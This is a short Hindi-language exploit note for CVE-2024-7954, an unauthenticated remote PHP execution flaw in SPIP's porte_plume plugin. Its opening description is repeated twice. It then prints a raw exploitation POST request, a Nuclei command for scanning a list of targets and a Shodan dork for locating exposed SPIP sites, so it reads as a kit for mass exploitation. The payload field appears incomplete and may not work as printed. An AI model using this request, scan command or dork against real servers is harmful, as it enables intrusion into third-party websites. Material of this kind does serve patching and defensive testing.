
SPIP के 4.30-alpha2, 4.2.13, और 4.1.16 से पहले के संस्करणों में उपयोग किया जाने वाला porte_plume प्लगइन एक मनमाना कोड निष्पादन भेद्यता के प्रति संवेदनशील है। एक दूरस्थ और अप्रमाणित हमलावर एक क्राफ्टेड HTTP अनुरोध भेजकर SPIP उपयोगकर्ता के रूप में मनमाना PHP निष्पादित कर सकता है। (CRITICAL)
SPIP के 4.30-alpha2, 4.2.13, और 4.1.16 से पहले के संस्करणों में उपयोग किया जाने वाला porte_plume प्लगइन एक मनमाना कोड निष्पादन भेद्यता (arbitrary code execution vulnerability) के प्रति संवेदनशील है। एक दूरस्थ और अप्रमाणित हमलावर SPIP उपयोगकर्ता के रूप में एक क्राफ्टेड HTTP अनुरोध भेजकर मनमाना PHP निष्पादित कर सकता है। (गंभीर)
शोषण:
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
data=AA_[->URL]_BB
प्रयुक्त उपकरण:
Nuclei -l(target file) -t(Templates) CVE-2024-7954.yml
Shodan Dork:
app="SPIP"